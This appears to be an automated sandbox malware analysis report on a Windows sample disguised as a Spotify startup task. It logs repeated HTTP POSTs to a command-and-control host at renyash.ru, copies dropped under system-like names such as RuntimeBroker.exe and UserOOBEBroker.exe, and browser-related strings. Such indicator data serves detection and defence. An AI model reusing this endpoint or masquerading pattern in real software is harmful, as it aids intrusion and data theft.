                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1048Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1768Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1048Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1780Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1048Expect: 100-continueConnection: Keep-Alive
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: global trafficDNS traffic detected: DNS query: 891781cm.renyash.ru
                              Source: unknownHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: RuntimeBroker.exe, 00000016.00000002.4116310590.0000000003610000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://891781cm.reP
                              Source: RuntimeBroker.exe, 00000016.00000002.4116310590.00000000030C4000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000016.00000002.4116310590.0000000003333000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000016.00000002.4116310590.0000000003295000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://891781cm.renyash.ru
                              Source: RuntimeBroker.exe, 00000016.00000002.4116310590.0000000002FB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://891781cm.renyash.ru/
                              Source: RuntimeBroker.exe, 00000016.00000002.4116310590.000000000346C000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000016.00000002.4116310590.0000000002FB7000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000016.00000002.4116310590.0000000003610000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000016.00000002.4116310590.00000000030C4000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000016.00000002.4116310590.0000000003333000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000016.00000002.4116310590.0000000003295000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://891781cm.renyash.ru/ProcessorServerdefaultsqltrafficuniversalwpprivate.php
                              Source: U1jaLbTw1f.exe, 00000000.00000002.1682090406.0000000003E9E000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000016.00000002.4116310590.0000000002FB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                              Source: RuntimeBroker.exe, 00000016.00000002.4184265798.000000001FE22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                              Source: RuntimeBroker.exe, 00000016.00000002.4184265798.000000001FE22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                              Source: RuntimeBroker.exe, 00000016.00000002.4184265798.000000001FE22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                              Source: RuntimeBroker.exe, 00000016.00000002.4184265798.000000001FE22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                              Source: RuntimeBroker.exe, 00000016.00000002.4184265798.000000001FE22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                              Source: RuntimeBroker.exe, 00000016.00000002.4184265798.000000001FE22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                              Source: RuntimeBroker.exe, 00000016.00000002.4184265798.000000001FE22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                              Source: RuntimeBroker.exe, 00000016.00000002.4184265798.000000001FE22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                              Source: RuntimeBroker.exe, 00000016.00000002.4184265798.000000001FE22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                              Source: RuntimeBroker.exe, 00000016.00000002.4184265798.000000001FE22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                              Source: RuntimeBroker.exe, 00000016.00000002.4184265798.000000001FE22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                              Source: RuntimeBroker.exe, 00000016.00000002.4184265798.000000001FE22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                              Source: RuntimeBroker.exe, 00000016.00000002.4184265798.000000001FE22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                              Source: RuntimeBroker.exe, 00000016.00000002.4184265798.000000001FE22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                              Source: RuntimeBroker.exe, 00000016.00000002.4184265798.000000001FE22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                              Source: RuntimeBroker.exe, 00000016.00000002.4184265798.000000001FE22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                              Source: RuntimeBroker.exe, 00000016.00000002.4184265798.000000001FE22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                              Source: RuntimeBroker.exe, 00000016.00000002.4184265798.000000001FE22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                              Source: RuntimeBroker.exe, 00000016.00000002.4184265798.000000001FE22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                              Source: RuntimeBroker.exe, 00000016.00000002.4184265798.000000001FE22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                              Source: RuntimeBroker.exe, 00000016.00000002.4184265798.000000001FE22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                              Source: RuntimeBroker.exe, 00000016.00000002.4184265798.000000001FE22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                              Source: RuntimeBroker.exe, 00000016.00000002.4184265798.000000001FE22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                              Source: RuntimeBroker.exe, 00000016.00000002.4184265798.000000001FE22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                              Source: RuntimeBroker.exe, 00000016.00000002.4184265798.000000001FE22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                              Source: fV8fWeo1SO.22.dr, ATu8gpifmd.22.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                              Source: fV8fWeo1SO.22.dr, ATu8gpifmd.22.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                              Source: fV8fWeo1SO.22.dr, ATu8gpifmd.22.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                              Source: fV8fWeo1SO.22.dr, ATu8gpifmd.22.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                              Source: fV8fWeo1SO.22.dr, ATu8gpifmd.22.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                              Source: fV8fWeo1SO.22.dr, ATu8gpifmd.22.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                              Source: fV8fWeo1SO.22.dr, ATu8gpifmd.22.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                              Source: fV8fWeo1SO.22.dr, ATu8gpifmd.22.drString found in binary or memory: https://www.ecosia.org/newtab/
                              Source: fV8fWeo1SO.22.dr, ATu8gpifmd.22.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeWindow created: window name: CLIPBRDWNDCLASS
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess Stats: CPU usage > 49%
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeFile created: C:\Windows\LiveKernelReports\UserOOBEBroker.exeJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeFile created: C:\Windows\LiveKernelReports\UserOOBEBroker.exe\:Zone.Identifier:$DATAJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeFile created: C:\Windows\LiveKernelReports\7ccfebd9e92364Jump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeFile created: C:\Windows\SchCache\RuntimeBroker.exeJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeFile created: C:\Windows\SchCache\RuntimeBroker.exe\:Zone.Identifier:$DATAJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeFile created: C:\Windows\SchCache\9e8d7a4ca61bd9Jump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeCode function: 0_2_00007FFD9B770D480_2_00007FFD9B770D48
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeCode function: 0_2_00007FFD9B770E430_2_00007FFD9B770E43
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeCode function: 0_2_00007FFD9BB6A6800_2_00007FFD9BB6A680
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeCode function: 15_2_00007FFD9B770D4815_2_00007FFD9B770D48
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeCode function: 15_2_00007FFD9B770E4315_2_00007FFD9B770E43
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeCode function: 15_2_00007FFD9B77964815_2_00007FFD9B779648
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeCode function: 15_2_00007FFD9B77956915_2_00007FFD9B779569
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeCode function: 15_2_00007FFD9B778E6115_2_00007FFD9B778E61
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeCode function: 15_2_00007FFD9B778ED315_2_00007FFD9B778ED3
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeCode function: 15_2_00007FFD9B78000015_2_00007FFD9B780000
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeCode function: 15_2_00007FFD9B7802F215_2_00007FFD9B7802F2
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeCode function: 15_2_00007FFD9B7802D315_2_00007FFD9B7802D3
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeCode function: 15_2_00007FFD9B7800D315_2_00007FFD9B7800D3
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeCode function: 15_2_00007FFD9B7A100015_2_00007FFD9B7A1000
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeCode function: 15_2_00007FFD9B7ACE5815_2_00007FFD9B7ACE58
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeCode function: 15_2_00007FFD9B7A951315_2_00007FFD9B7A9513
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeCode function: 18_2_00007FFD9B780D4818_2_00007FFD9B780D48
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeCode function: 18_2_00007FFD9B780E4318_2_00007FFD9B780E43
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeCode function: 20_2_00007FFD9B770D4820_2_00007FFD9B770D48
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeCode function: 20_2_00007FFD9B770E4320_2_00007FFD9B770E43
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeCode function: 20_2_00007FFD9B77964820_2_00007FFD9B779648
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeCode function: 20_2_00007FFD9B77956920_2_00007FFD9B779569
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeCode function: 20_2_00007FFD9B778E6120_2_00007FFD9B778E61
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeCode function: 20_2_00007FFD9B778ED320_2_00007FFD9B778ED3
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeCode function: 20_2_00007FFD9B7A100020_2_00007FFD9B7A1000
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeCode function: 20_2_00007FFD9B7ACE5820_2_00007FFD9B7ACE58
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeCode function: 20_2_00007FFD9B7A951320_2_00007FFD9B7A9513
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeCode function: 20_2_00007FFD9B7802F220_2_00007FFD9B7802F2
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeCode function: 20_2_00007FFD9B7802D320_2_00007FFD9B7802D3
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeCode function: 20_2_00007FFD9B7800D320_2_00007FFD9B7800D3
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeCode function: 20_2_00007FFD9B78000020_2_00007FFD9B780000
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeCode function: 22_2_00007FFD9B780D4822_2_00007FFD9B780D48
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeCode function: 22_2_00007FFD9B780E4322_2_00007FFD9B780E43
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeCode function: 22_2_00007FFD9B78964822_2_00007FFD9B789648
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeCode function: 22_2_00007FFD9B78956922_2_00007FFD9B789569
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeCode function: 22_2_00007FFD9B788E6122_2_00007FFD9B788E61
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeCode function: 22_2_00007FFD9B788ED322_2_00007FFD9B788ED3
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeCode function: 22_2_00007FFD9B79000022_2_00007FFD9B790000
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeCode function: 22_2_00007FFD9B7902F222_2_00007FFD9B7902F2
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeCode function: 22_2_00007FFD9B7902D322_2_00007FFD9B7902D3
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeCode function: 22_2_00007FFD9B7900D322_2_00007FFD9B7900D3
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeCode function: 22_2_00007FFD9B7BD8F522_2_00007FFD9B7BD8F5
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeCode function: 22_2_00007FFD9B7B100022_2_00007FFD9B7B1000
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeCode function: 22_2_00007FFD9B7C275822_2_00007FFD9B7C2758
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeCode function: 22_2_00007FFD9B7B951322_2_00007FFD9B7B9513
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeCode function: 22_2_00007FFD9BB7B51322_2_00007FFD9BB7B513
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeCode function: 23_2_00007FFD9B78100023_2_00007FFD9B781000
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeCode function: 23_2_00007FFD9B78CE5823_2_00007FFD9B78CE58
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeCode function: 23_2_00007FFD9B78951323_2_00007FFD9B789513
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeCode function: 23_2_00007FFD9B75964823_2_00007FFD9B759648
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeCode function: 23_2_00007FFD9B75956923_2_00007FFD9B759569
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeCode function: 23_2_00007FFD9B758E6123_2_00007FFD9B758E61
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeCode function: 23_2_00007FFD9B758ED323_2_00007FFD9B758ED3
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeCode function: 23_2_00007FFD9B76000023_2_00007FFD9B760000
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeCode function: 23_2_00007FFD9B7602F223_2_00007FFD9B7602F2
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeCode function: 23_2_00007FFD9B7602D323_2_00007FFD9B7602D3
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeCode function: 23_2_00007FFD9B7600D323_2_00007FFD9B7600D3
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeCode function: 23_2_00007FFD9B750D4823_2_00007FFD9B750D48
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeCode function: 23_2_00007FFD9B750E4323_2_00007FFD9B750E43
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeCode function: 28_2_00007FFD9B790D4828_2_00007FFD9B790D48
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeCode function: 28_2_00007FFD9B790E4328_2_00007FFD9B790E43
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeCode function: 29_2_00007FFD9B770D4829_2_00007FFD9B770D48
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeCode function: 29_2_00007FFD9B770E4329_2_00007FFD9B770E43
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeCode function: 29_2_00007FFD9B7A100029_2_00007FFD9B7A1000
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeCode function: 29_2_00007FFD9B7ACE5829_2_00007FFD9B7ACE58
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeCode function: 29_2_00007FFD9B7A951329_2_00007FFD9B7A9513
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeCode function: 29_2_00007FFD9B77964829_2_00007FFD9B779648
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeCode function: 29_2_00007FFD9B77956929_2_00007FFD9B779569
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeCode function: 29_2_00007FFD9B778E6129_2_00007FFD9B778E61
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeCode function: 29_2_00007FFD9B778ED329_2_00007FFD9B778ED3
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeCode function: 29_2_00007FFD9B78000029_2_00007FFD9B780000
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeCode function: 29_2_00007FFD9B7802F229_2_00007FFD9B7802F2
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeCode function: 29_2_00007FFD9B7802D329_2_00007FFD9B7802D3
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeCode function: 29_2_00007FFD9B7800D329_2_00007FFD9B7800D3
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeCode function: 30_2_00007FFD9B78100030_2_00007FFD9B781000
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeCode function: 30_2_00007FFD9B78CE5830_2_00007FFD9B78CE58
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeCode function: 30_2_00007FFD9B78951330_2_00007FFD9B789513
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeCode function: 30_2_00007FFD9B75964830_2_00007FFD9B759648
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeCode function: 30_2_00007FFD9B75956930_2_00007FFD9B759569
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeCode function: 30_2_00007FFD9B758E6130_2_00007FFD9B758E61
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeCode function: 30_2_00007FFD9B758ED330_2_00007FFD9B758ED3
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeCode function: 30_2_00007FFD9B76000030_2_00007FFD9B760000
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeCode function: 30_2_00007FFD9B7602F230_2_00007FFD9B7602F2
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeCode function: 30_2_00007FFD9B7602D330_2_00007FFD9B7602D3
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeCode function: 30_2_00007FFD9B7600D330_2_00007FFD9B7600D3
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeCode function: 30_2_00007FFD9B750D4830_2_00007FFD9B750D48
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeCode function: 30_2_00007FFD9B750E4330_2_00007FFD9B750E43
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeCode function: 31_2_00007FFD9B750D4831_2_00007FFD9B750D48
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeCode function: 31_2_00007FFD9B750E4331_2_00007FFD9B750E43
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeCode function: 37_2_00007FFD9B790D4837_2_00007FFD9B790D48
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeCode function: 37_2_00007FFD9B790E4337_2_00007FFD9B790E43
                              Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\YEfCwsuO.log AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                              Source: U1jaLbTw1f.exe, 00000000.00000000.1642439161.0000000000F56000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs U1jaLbTw1f.exe
                              Source: U1jaLbTw1f.exe, 0000001C.00000002.1834981673.0000000002F71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs U1jaLbTw1f.exe
                              Source: U1jaLbTw1f.exe, 0000001C.00000002.1834981673.0000000002F60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs U1jaLbTw1f.exe
                              Source: U1jaLbTw1f.exe, 0000001C.00000002.1834981673.000000000302E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs U1jaLbTw1f.exe
                              Source: U1jaLbTw1f.exe, 0000001C.00000002.1821896177.0000000000F38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs U1jaLbTw1f.exe
                              Source: U1jaLbTw1f.exe, 0000001D.00000002.1834989922.0000000002B30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs U1jaLbTw1f.exe
                              Source: U1jaLbTw1f.exeBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs U1jaLbTw1f.exe
